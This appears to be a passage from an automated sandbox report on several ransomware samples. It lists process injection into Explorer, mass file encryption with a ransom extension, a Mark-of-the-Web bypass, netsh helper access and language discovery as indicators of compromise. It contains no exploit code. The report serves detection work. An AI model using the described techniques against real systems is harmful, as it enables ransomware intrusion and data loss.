description pid Process procid_target PID 2612 set thread context of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 4960 set thread context of 5172 4960 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 196 PID 4644 set thread context of 3608 4644 HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe 172 PID 6620 set thread context of 5248 6620 Trojan-Ransom.Win32.Foreign.oafd-3887453dd2419266bdba711d7dffabff1f7ec5b2eef4d219e0b86103566192a2.exe 379 PID 5248 set thread context of 3432 5248 control.exe 56 PID 3432 set thread context of 3912 3432 Explorer.EXE 60 PID 3432 set thread context of 4100 3432 Explorer.EXE 62 PID 5248 set thread context of 9184 5248 control.exe 383 PID 3432 set thread context of 1812 3432 Explorer.EXE 76 PID 3432 set thread context of 5396 3432 Explorer.EXE 395 PID 3432 set thread context of 5136 3432 Explorer.EXE 437 PID 5584 set thread context of 5308 5584 Trojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exe 578 -
resource yara_rule behavioral1/memory/7844-13663-0x0000000015190000-0x00000000151D7000-memory.dmp upx behavioral1/memory/7844-18393-0x0000000015190000-0x00000000151D7000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FSTOCK.DLL.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Data.Services.Design.resources.dll Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Diagnostics\Comprehensive\Comprehensive.Tests.ps1 Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg7_thumb.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\ui-strings.js Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8FR.LEX.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-ul-oob.xrm-ms.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\MySharePoints.ico.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-synch-l1-2-0.dll Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Light.scale-100.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\WideTile.scale-100.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ul-phn.xrm-ms.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_EN.LEX.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\libarchive_plugin.dll Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\7-Zip\Lang\uz.txt.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageSplashScreen.scale-125.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailBadge.scale-150.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fr_get.svg.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30_altform-unplated.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected] Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-60_altform-unplated_contrast-white.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.ServiceModel.Primitives.dll Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.Ping.dll.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe.config Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LibrarySquare71x71Logo.scale-200_contrast-black.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-pl.xrm-ms.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\README_en_CA.txt.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\SONORA.ELM.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwclassic.dotx Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\excelmui.msi.16.en-us.tree.dat.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xsl Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GameBar_WideTile.scale-100.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\vi_get.svg Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.POWERPNT.16.1033.hxn.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libadf_plugin.dll.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125_contrast-black.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderMedTile.contrast-black_scale-125.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\190.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview-hover.svg.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSmallTile.scale-150_contrast-white.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\System.Windows.Controls.Ribbon.resources.dll.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.Windows.Presentation.dll.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\VariableFrameRateVideoPlayer.xbf Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\10.rsrc Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\tr.pak.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-32_altform-lightunplated.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailBadge.scale-100.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\Java\jre-1.8\lib\jvm.hprof.txt.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_pt-PT.dll Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-40_altform-unplated.png Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_duplicate_18.svg Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e5936e5.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI389E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3AB8.tmp msiexec.exe File created C:\Windows\Installer\e5936e5.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI37DF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI387E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI38AF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI39DB.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{5B964E0E-B9A3-4276-9ED9-4D5A5720747A} msiexec.exe File opened for modification C:\Windows\win.ini HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe File opened for modification C:\Windows\Installer\MSI395D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3A78.tmp msiexec.exe File opened for modification C:\Windows\win.ini Trojan-Ransom.Win32.GandCrypt.amg-4d62bf2cec92989f49174a55334387431c96e9712f6803a1c80edf04228cb514.exe File opened for modification C:\Windows\Installer\MSI380F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI383F.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI38C0.tmp msiexec.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File created C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe:Zone.Identifier cmd.exe File opened for modification C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe:Zone.Identifier cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 13 IoCs
pid pid_target Process procid_target 5444 5060 WerFault.exe 111 6140 5540 WerFault.exe 121 8308 8484 WerFault.exe 158 9268 6620 WerFault.exe 147 8188 6620 WerFault.exe 147 9448 6332 WerFault.exe 149 9184 6620 WerFault.exe 147 3656 6620 WerFault.exe 147 8300 6620 WerFault.exe 147 6688 6620 WerFault.exe 147 7856 6620 WerFault.exe 147 6260 6620 WerFault.exe 147 10132 6620 WerFault.exe 147 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crypmod.aatd-7a9ebb7dbb01023d06aab08743dd3af2ffa4bf86aff6bbe487f4e7f5596fc230.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.oeth-3adfcd410678aeb41bc482ca955077c844c9b56748c7989d10ef003e0757f06c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TR6B07~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 